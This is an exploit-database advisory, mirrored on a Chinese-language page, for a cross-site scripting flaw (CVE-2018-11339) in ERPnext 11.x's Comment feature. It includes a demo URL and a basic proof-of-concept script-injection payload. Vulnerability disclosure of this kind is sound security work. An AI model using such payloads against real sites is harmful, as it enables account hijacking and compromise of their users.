ERPnext 11 – Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： Veerababu Penugonda
  日期： 2018-05-22
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/44691/

• # Exploit Title: ERPnext 11.x.x - Cross-Site Scripting
  # Date: 2018-05-10
  # Exploit Author: Veerababu Penugonda
  # Vendor Homepage: https://erpnext.com/
  # Software Link: https://demo.erpnext.com/
  # Version: Frappe ERPNext v11.x.x-develop
  # Tested on: Mozilla Firefox quantum 60.1 , Ubuntu OS
  # CVE : CVE-2018-11339
  
  # 1. Description:
  # https://demo.erpnext.com/desk#Form/Asset%20Repair/ARLOG-000015
  # and functionality “Comment” is vulnerable to XSS like Stored ,
  # Reflected , Cookie , possible for more
  
  # 2. Payload : 
  
  "><script>alert(1)</script>